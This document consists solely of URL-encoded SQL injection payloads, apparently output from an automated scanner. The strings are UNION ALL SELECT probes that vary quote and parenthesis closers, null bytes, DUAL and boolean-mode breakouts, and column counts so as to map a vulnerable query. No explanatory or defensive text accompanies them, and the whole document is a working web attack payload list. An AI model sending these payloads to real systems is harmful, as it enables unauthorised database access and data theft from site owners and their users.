-1791%00%27%29%20UNION%20ALL%20SELECT%204964%2C4964%2C4964%2C4964%2C4964%2C4964%2C4964%2C4964%2C4964%2C4964%2C4964%2C4964%2C4964--%20 -8285%00%27%29%20UNION%20ALL%20SELECT%202560%2C2560%2C2560%2C2560%2C2560%2C2560%2C2560%2C2560%2C2560%2C2560%2C2560%2C2560%2C2560%2C2560--%20 -9393%00%27%29%20UNION%20ALL%20SELECT%205610%2C5610%2C5610%2C5610%2C5610%2C5610%2C5610%2C5610%2C5610%2C5610%2C5610%2C5610%2C5610%2C5610%2C5610--%20 -5701%00%27%29%20UNION%20ALL%20SELECT%209240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240%2C9240--%20 -8321%00%27%29%20UNION%20ALL%20SELECT%206567%2C6567%2C6567%2C6567%2C6567%2C6567%2C6567%2C6567%2C6567%2C6567%2C6567%2C6567%2C6567%2C6567%2C6567%2C6567%2C6567--%20 -7811%00%27%29%20UNION%20ALL%20SELECT%205517%2C5517%2C5517%2C5517%2C5517%2C5517%2C5517%2C5517%2C5517%2C5517%2C5517%2C5517%2C5517%2C5517%2C5517%2C5517%2C5517%2C5517--%20 -3770%00%27%29%20UNION%20ALL%20SELECT%209313%2C9313%2C9313%2C9313%2C9313%2C9313%2C9313%2C9313%2C9313%2C9313%2C9313%2C9313%2C9313%2C9313%2C9313%2C9313%2C9313%2C9313%2C9313--%20 -1744%00%27%29%20UNION%20ALL%20SELECT%209534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534--%20 -2691%00%27%20UNION%20ALL%20SELECT%207076%2C7076%2C7076%2C7076%2C7076%2C7076%2C7076%2C7076%2C7076%2C7076%2C7076--%20 -3278%00%27%20UNION%20ALL%20SELECT%203920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920--%20 -9681%00%27%20UNION%20ALL%20SELECT%201488%2C1488%2C1488%2C1488%2C1488%2C1488%2C1488%2C1488%2C1488%2C1488%2C1488%2C1488%2C1488--%20 -2151%00%27%20UNION%20ALL%20SELECT%205465%2C5465%2C5465%2C5465%2C5465%2C5465%2C5465%2C5465%2C5465%2C5465%2C5465%2C5465%2C5465%2C5465--%20 -8969%00%27%20UNION%20ALL%20SELECT%209911%2C9911%2C9911%2C9911%2C9911%2C9911%2C9911%2C9911%2C9911%2C9911%2C9911%2C9911%2C9911%2C9911%2C9911--%20 -7120%00%27%20UNION%20ALL%20SELECT%204679%2C4679%2C4679%2C4679%2C4679%2C4679%2C4679%2C4679%2C4679%2C4679%2C4679%2C4679%2C4679%2C4679%2C4679%2C4679--%20 -5217%00%27%20UNION%20ALL%20SELECT%201014%2C1014%2C1014%2C1014%2C1014%2C1014%2C1014%2C1014%2C1014%2C1014%2C1014%2C1014%2C1014%2C1014%2C1014%2C1014%2C1014--%20 -8039%00%27%20UNION%20ALL%20SELECT%202955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955--%20 -6691%00%27%20UNION%20ALL%20SELECT%204061%2C4061%2C4061%2C4061%2C4061%2C4061%2C4061%2C4061%2C4061%2C4061%2C4061%2C4061%2C4061%2C4061%2C4061%2C4061%2C4061%2C4061%2C4061--%20 -7551%00%27%20UNION%20ALL%20SELECT%203871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871--%20 -4954%27%29%20WHERE%208201%3D8201%20UNION%20ALL%20SELECT%208201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201--%20 -9176%27%29%20WHERE%208931%3D8931%20UNION%20ALL%20SELECT%208931%2C8931%2C8931%2C8931%2C8931%2C8931%2C8931%2C8931%2C8931%2C8931%2C8931%2C8931--%20 -1103%27%29%20WHERE%208066%3D8066%20UNION%20ALL%20SELECT%208066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066--%20 -7906%27%29%20WHERE%206974%3D6974%20UNION%20ALL%20SELECT%206974%2C6974%2C6974%2C6974%2C6974%2C6974%2C6974%2C6974%2C6974%2C6974%2C6974%2C6974%2C6974%2C6974--%20 -2147%27%29%20WHERE%201853%3D1853%20UNION%20ALL%20SELECT%201853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853--%20 -9723%27%29%20WHERE%204064%3D4064%20UNION%20ALL%20SELECT%204064%2C4064%2C4064%2C4064%2C4064%2C4064%2C4064%2C4064%2C4064%2C4064%2C4064%2C4064%2C4064%2C4064%2C4064%2C4064--%20 -8899%27%29%20WHERE%205661%3D5661%20UNION%20ALL%20SELECT%205661%2C5661%2C5661%2C5661%2C5661%2C5661%2C5661%2C5661%2C5661%2C5661%2C5661%2C5661%2C5661%2C5661%2C5661%2C5661%2C5661--%20 -7846%27%29%20WHERE%201432%3D1432%20UNION%20ALL%20SELECT%201432%2C1432%2C1432%2C1432%2C1432%2C1432%2C1432%2C1432%2C1432%2C1432%2C1432%2C1432%2C1432%2C1432%2C1432%2C1432%2C1432%2C1432--%20 -1935%27%29%20WHERE%207096%3D7096%20UNION%20ALL%20SELECT%207096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096--%20 -9240%27%29%20WHERE%208228%3D8228%20UNION%20ALL%20SELECT%208228%2C8228%2C8228%2C8228%2C8228%2C8228%2C8228%2C8228%2C8228%2C8228%2C8228%2C8228%2C8228%2C8228%2C8228%2C8228%2C8228%2C8228%2C8228%2C8228--%20 -9061%22%29%20WHERE%205438%3D5438%20UNION%20ALL%20SELECT%205438%2C5438%2C5438%2C5438%2C5438%2C5438%2C5438%2C5438%2C5438%2C5438%2C5438--%20 -4479%22%29%20WHERE%205038%3D5038%20UNION%20ALL%20SELECT%205038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038%2C5038--%20 -4359%22%29%20WHERE%204470%3D4470%20UNION%20ALL%20SELECT%204470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470%2C4470--%20 -3038%22%29%20WHERE%206305%3D6305%20UNION%20ALL%20SELECT%206305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305--%20 -7496%22%29%20WHERE%202933%3D2933%20UNION%20ALL%20SELECT%202933%2C2933%2C2933%2C2933%2C2933%2C2933%2C2933%2C2933%2C2933%2C2933%2C2933%2C2933%2C2933%2C2933%2C2933--%20 -2294%22%29%20WHERE%201007%3D1007%20UNION%20ALL%20SELECT%201007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007--%20 -9627%22%29%20WHERE%207959%3D7959%20UNION%20ALL%20SELECT%207959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959%2C7959--%20 -4958%22%29%20WHERE%206079%3D6079%20UNION%20ALL%20SELECT%206079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079--%20 -1074%22%29%20WHERE%203950%3D3950%20UNION%20ALL%20SELECT%203950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950--%20 -2262%22%29%20WHERE%205325%3D5325%20UNION%20ALL%20SELECT%205325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325%2C5325--%20 -4519%27%20WHERE%203530%3D3530%20UNION%20ALL%20SELECT%203530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530--%20 -4914%27%20WHERE%202109%3D2109%20UNION%20ALL%20SELECT%202109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109--%20 -3701%27%20WHERE%207808%3D7808%20UNION%20ALL%20SELECT%207808%2C7808%2C7808%2C7808%2C7808%2C7808%2C7808%2C7808%2C7808%2C7808%2C7808%2C7808%2C7808--%20 -2193%27%20WHERE%207044%3D7044%20UNION%20ALL%20SELECT%207044%2C7044%2C7044%2C7044%2C7044%2C7044%2C7044%2C7044%2C7044%2C7044%2C7044%2C7044%2C7044%2C7044--%20 -9333%27%20WHERE%206597%3D6597%20UNION%20ALL%20SELECT%206597%2C6597%2C6597%2C6597%2C6597%2C6597%2C6597%2C6597%2C6597%2C6597%2C6597%2C6597%2C6597%2C6597%2C6597--%20 -2020%27%20WHERE%201369%3D1369%20UNION%20ALL%20SELECT%201369%2C1369%2C1369%2C1369%2C1369%2C1369%2C1369%2C1369%2C1369%2C1369%2C1369%2C1369%2C1369%2C1369%2C1369%2C1369--%20 -8364%27%20WHERE%208854%3D8854%20UNION%20ALL%20SELECT%208854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854--%20 -1308%27%20WHERE%201624%3D1624%20UNION%20ALL%20SELECT%201624%2C1624%2C1624%2C1624%2C1624%2C1624%2C1624%2C1624%2C1624%2C1624%2C1624%2C1624%2C1624%2C1624%2C1624%2C1624%2C1624%2C1624--%20 -2883%27%20WHERE%209321%3D9321%20UNION%20ALL%20SELECT%209321%2C9321%2C9321%2C9321%2C9321%2C9321%2C9321%2C9321%2C9321%2C9321%2C9321%2C9321%2C9321%2C9321%2C9321%2C9321%2C9321%2C9321%2C9321--%20 -9787%27%20WHERE%207014%3D7014%20UNION%20ALL%20SELECT%207014%2C7014%2C7014%2C7014%2C7014%2C7014%2C7014%2C7014%2C7014%2C7014%2C7014%2C7014%2C7014%2C7014%2C7014%2C7014%2C7014%2C7014%2C7014%2C7014--%20 -7349%22%20WHERE%203635%3D3635%20UNION%20ALL%20SELECT%203635%2C3635%2C3635%2C3635%2C3635%2C3635%2C3635%2C3635%2C3635%2C3635%2C3635--%20 -2224%22%20WHERE%208279%3D8279%20UNION%20ALL%20SELECT%208279%2C8279%2C8279%2C8279%2C8279%2C8279%2C8279%2C8279%2C8279%2C8279%2C8279%2C8279--%20 -4190%22%20WHERE%206562%3D6562%20UNION%20ALL%20SELECT%206562%2C6562%2C6562%2C6562%2C6562%2C6562%2C6562%2C6562%2C6562%2C6562%2C6562%2C6562%2C6562--%20 -6019%22%20WHERE%208770%3D8770%20UNION%20ALL%20SELECT%208770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770%2C8770--%20 -9927%22%20WHERE%202927%3D2927%20UNION%20ALL%20SELECT%202927%2C2927%2C2927%2C2927%2C2927%2C2927%2C2927%2C2927%2C2927%2C2927%2C2927%2C2927%2C2927%2C2927%2C2927--%20 -6976%22%20WHERE%204278%3D4278%20UNION%20ALL%20SELECT%204278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278--%20 -6892%22%20WHERE%203660%3D3660%20UNION%20ALL%20SELECT%203660%2C3660%2C3660%2C3660%2C3660%2C3660%2C3660%2C3660%2C3660%2C3660%2C3660%2C3660%2C3660%2C3660%2C3660%2C3660%2C3660--%20 -8380%22%20WHERE%202881%3D2881%20UNION%20ALL%20SELECT%202881%2C2881%2C2881%2C2881%2C2881%2C2881%2C2881%2C2881%2C2881%2C2881%2C2881%2C2881%2C2881%2C2881%2C2881%2C2881%2C2881%2C2881--%20 -5082%22%20WHERE%206005%3D6005%20UNION%20ALL%20SELECT%206005%2C6005%2C6005%2C6005%2C6005%2C6005%2C6005%2C6005%2C6005%2C6005%2C6005%2C6005%2C6005%2C6005%2C6005%2C6005%2C6005%2C6005%2C6005--%20 -7332%22%20WHERE%208485%3D8485%20UNION%20ALL%20SELECT%208485%2C8485%2C8485%2C8485%2C8485%2C8485%2C8485%2C8485%2C8485%2C8485%2C8485%2C8485%2C8485%2C8485%2C8485%2C8485%2C8485%2C8485%2C8485%2C8485--%20 -1633%27%7C%7C%28SELECT%20%27drVe%27%20FROM%20DUAL%20WHERE%201339%3D1339%20UNION%20ALL%20SELECT%201339%2C1339%2C1339%2C1339%2C1339%2C1339%2C1339%2C1339%2C1339%2C1339%2C1339--%20 -4037%27%7C%7C%28SELECT%20%27ulFs%27%20FROM%20DUAL%20WHERE%201323%3D1323%20UNION%20ALL%20SELECT%201323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323--%20 -6415%27%7C%7C%28SELECT%20%27kNie%27%20FROM%20DUAL%20WHERE%203137%3D3137%20UNION%20ALL%20SELECT%203137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137--%20 -3971%27%7C%7C%28SELECT%20%27CWEa%27%20FROM%20DUAL%20WHERE%202124%3D2124%20UNION%20ALL%20SELECT%202124%2C2124%2C2124%2C2124%2C2124%2C2124%2C2124%2C2124%2C2124%2C2124%2C2124%2C2124%2C2124%2C2124--%20 -8325%27%7C%7C%28SELECT%20%27hapZ%27%20FROM%20DUAL%20WHERE%208506%3D8506%20UNION%20ALL%20SELECT%208506%2C8506%2C8506%2C8506%2C8506%2C8506%2C8506%2C8506%2C8506%2C8506%2C8506%2C8506%2C8506%2C8506%2C8506--%20 -4620%27%7C%7C%28SELECT%20%27Gigi%27%20FROM%20DUAL%20WHERE%203213%3D3213%20UNION%20ALL%20SELECT%203213%2C3213%2C3213%2C3213%2C3213%2C3213%2C3213%2C3213%2C3213%2C3213%2C3213%2C3213%2C3213%2C3213%2C3213%2C3213--%20 -4648%27%7C%7C%28SELECT%20%27zjqk%27%20FROM%20DUAL%20WHERE%206133%3D6133%20UNION%20ALL%20SELECT%206133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133--%20 -8045%27%7C%7C%28SELECT%20%27rtNb%27%20FROM%20DUAL%20WHERE%207935%3D7935%20UNION%20ALL%20SELECT%207935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935--%20 -7173%27%7C%7C%28SELECT%20%27ULTT%27%20FROM%20DUAL%20WHERE%208700%3D8700%20UNION%20ALL%20SELECT%208700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700--%20 -6809%27%7C%7C%28SELECT%20%27MVpt%27%20FROM%20DUAL%20WHERE%202340%3D2340%20UNION%20ALL%20SELECT%202340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340%2C2340--%20 -5131%27%7C%7C%28SELECT%20%27RqSu%27%20WHERE%201054%3D1054%20UNION%20ALL%20SELECT%201054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054--%20 -7965%27%7C%7C%28SELECT%20%27ogyA%27%20WHERE%204127%3D4127%20UNION%20ALL%20SELECT%204127%2C4127%2C4127%2C4127%2C4127%2C4127%2C4127%2C4127%2C4127%2C4127%2C4127%2C4127--%20 -8653%27%7C%7C%28SELECT%20%27Lvxq%27%20WHERE%206141%3D6141%20UNION%20ALL%20SELECT%206141%2C6141%2C6141%2C6141%2C6141%2C6141%2C6141%2C6141%2C6141%2C6141%2C6141%2C6141%2C6141--%20 -2447%27%7C%7C%28SELECT%20%27GUne%27%20WHERE%209546%3D9546%20UNION%20ALL%20SELECT%209546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546--%20 -4586%27%7C%7C%28SELECT%20%27Ofyk%27%20WHERE%205353%3D5353%20UNION%20ALL%20SELECT%205353%2C5353%2C5353%2C5353%2C5353%2C5353%2C5353%2C5353%2C5353%2C5353%2C5353%2C5353%2C5353%2C5353%2C5353--%20 -6297%27%7C%7C%28SELECT%20%27DrBS%27%20WHERE%208108%3D8108%20UNION%20ALL%20SELECT%208108%2C8108%2C8108%2C8108%2C8108%2C8108%2C8108%2C8108%2C8108%2C8108%2C8108%2C8108%2C8108%2C8108%2C8108%2C8108--%20 -7096%27%7C%7C%28SELECT%20%27Mype%27%20WHERE%202435%3D2435%20UNION%20ALL%20SELECT%202435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435--%20 -6574%27%7C%7C%28SELECT%20%27jGsN%27%20WHERE%202215%3D2215%20UNION%20ALL%20SELECT%202215%2C2215%2C2215%2C2215%2C2215%2C2215%2C2215%2C2215%2C2215%2C2215%2C2215%2C2215%2C2215%2C2215%2C2215%2C2215%2C2215%2C2215--%20 -3342%27%7C%7C%28SELECT%20%27xfgT%27%20WHERE%202630%3D2630%20UNION%20ALL%20SELECT%202630%2C2630%2C2630%2C2630%2C2630%2C2630%2C2630%2C2630%2C2630%2C2630%2C2630%2C2630%2C2630%2C2630%2C2630%2C2630%2C2630%2C2630%2C2630--%20 -4137%27%7C%7C%28SELECT%20%27XOOa%27%20WHERE%206364%3D6364%20UNION%20ALL%20SELECT%206364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364--%20 -2604%27%2B%28SELECT%20Ezix%20WHERE%206848%3D6848%20UNION%20ALL%20SELECT%206848%2C6848%2C6848%2C6848%2C6848%2C6848%2C6848%2C6848%2C6848%2C6848%2C6848--%20 -7130%27%2B%28SELECT%20ellY%20WHERE%203291%3D3291%20UNION%20ALL%20SELECT%203291%2C3291%2C3291%2C3291%2C3291%2C3291%2C3291%2C3291%2C3291%2C3291%2C3291%2C3291--%20 -1190%27%2B%28SELECT%20pWsT%20WHERE%208537%3D8537%20UNION%20ALL%20SELECT%208537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537--%20 -2029%27%2B%28SELECT%20qRqR%20WHERE%209690%3D9690%20UNION%20ALL%20SELECT%209690%2C9690%2C9690%2C9690%2C9690%2C9690%2C9690%2C9690%2C9690%2C9690%2C9690%2C9690%2C9690%2C9690--%20 -6256%27%2B%28SELECT%20fqoU%20WHERE%209831%3D9831%20UNION%20ALL%20SELECT%209831%2C9831%2C9831%2C9831%2C9831%2C9831%2C9831%2C9831%2C9831%2C9831%2C9831%2C9831%2C9831%2C9831%2C9831--%20 -7187%27%2B%28SELECT%20xjfn%20WHERE%201832%3D1832%20UNION%20ALL%20SELECT%201832%2C1832%2C1832%2C1832%2C1832%2C1832%2C1832%2C1832%2C1832%2C1832%2C1832%2C1832%2C1832%2C1832%2C1832%2C1832--%20 -8298%27%2B%28SELECT%20yVsy%20WHERE%202042%3D2042%20UNION%20ALL%20SELECT%202042%2C2042%2C2042%2C2042%2C2042%2C2042%2C2042%2C2042%2C2042%2C2042%2C2042%2C2042%2C2042%2C2042%2C2042%2C2042%2C2042--%20 -7735%27%2B%28SELECT%20EZfl%20WHERE%208624%3D8624%20UNION%20ALL%20SELECT%208624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624%2C8624--%20 -1137%27%2B%28SELECT%20fyso%20WHERE%204459%3D4459%20UNION%20ALL%20SELECT%204459%2C4459%2C4459%2C4459%2C4459%2C4459%2C4459%2C4459%2C4459%2C4459%2C4459%2C4459%2C4459%2C4459%2C4459%2C4459%2C4459%2C4459%2C4459--%20 -1101%27%2B%28SELECT%20iUfS%20WHERE%202238%3D2238%20UNION%20ALL%20SELECT%202238%2C2238%2C2238%2C2238%2C2238%2C2238%2C2238%2C2238%2C2238%2C2238%2C2238%2C2238%2C2238%2C2238%2C2238%2C2238%2C2238%2C2238%2C2238%2C2238--%20 -6381%27%2B%28SELECT%20%27Ugir%27%20WHERE%201654%3D1654%20UNION%20ALL%20SELECT%201654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654--%20 -5212%27%2B%28SELECT%20%27pBsN%27%20WHERE%209424%3D9424%20UNION%20ALL%20SELECT%209424%2C9424%2C9424%2C9424%2C9424%2C9424%2C9424%2C9424%2C9424%2C9424%2C9424%2C9424--%20 -5805%27%2B%28SELECT%20%27yocC%27%20WHERE%202443%3D2443%20UNION%20ALL%20SELECT%202443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443--%20 -1465%27%2B%28SELECT%20%27SYjY%27%20WHERE%203058%3D3058%20UNION%20ALL%20SELECT%203058%2C3058%2C3058%2C3058%2C3058%2C3058%2C3058%2C3058%2C3058%2C3058%2C3058%2C3058%2C3058%2C3058--%20 -2426%27%2B%28SELECT%20%27oxtD%27%20WHERE%205467%3D5467%20UNION%20ALL%20SELECT%205467%2C5467%2C5467%2C5467%2C5467%2C5467%2C5467%2C5467%2C5467%2C5467%2C5467%2C5467%2C5467%2C5467%2C5467--%20 -4108%27%2B%28SELECT%20%27azEa%27%20WHERE%205164%3D5164%20UNION%20ALL%20SELECT%205164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164--%20 -5718%27%2B%28SELECT%20%27KyFq%27%20WHERE%205606%3D5606%20UNION%20ALL%20SELECT%205606%2C5606%2C5606%2C5606%2C5606%2C5606%2C5606%2C5606%2C5606%2C5606%2C5606%2C5606%2C5606%2C5606%2C5606%2C5606%2C5606--%20 -2980%27%2B%28SELECT%20%27DweJ%27%20WHERE%205531%3D5531%20UNION%20ALL%20SELECT%205531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531--%20 -1216%27%2B%28SELECT%20%27oezL%27%20WHERE%206444%3D6444%20UNION%20ALL%20SELECT%206444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444--%20 -3272%27%2B%28SELECT%20%27fhnw%27%20WHERE%205303%3D5303%20UNION%20ALL%20SELECT%205303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303--%20 -6783%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675--%20 -8340%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208083%2C8083%2C8083%2C8083%2C8083%2C8083%2C8083%2C8083%2C8083%2C8083%2C8083%2C8083--%20 -6163%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203654%2C3654%2C3654%2C3654%2C3654%2C3654%2C3654%2C3654%2C3654%2C3654%2C3654%2C3654%2C3654--%20 -8428%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208502%2C8502%2C8502%2C8502%2C8502%2C8502%2C8502%2C8502%2C8502%2C8502%2C8502%2C8502%2C8502%2C8502--%20 -2742%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209938%2C9938%2C9938%2C9938%2C9938%2C9938%2C9938%2C9938%2C9938%2C9938%2C9938%2C9938%2C9938%2C9938%2C9938--%20 -8318%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205809%2C5809%2C5809%2C5809%2C5809%2C5809%2C5809%2C5809%2C5809%2C5809%2C5809%2C5809%2C5809%2C5809%2C5809%2C5809--%20 -2207%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563--%20 -7072%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703--%20 -1452%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202089%2C2089%2C2089%2C2089%2C2089%2C2089%2C2089%2C2089%2C2089%2C2089%2C2089%2C2089%2C2089%2C2089%2C2089%2C2089%2C2089%2C2089%2C2089--%20 -2170%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604%2C3604--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 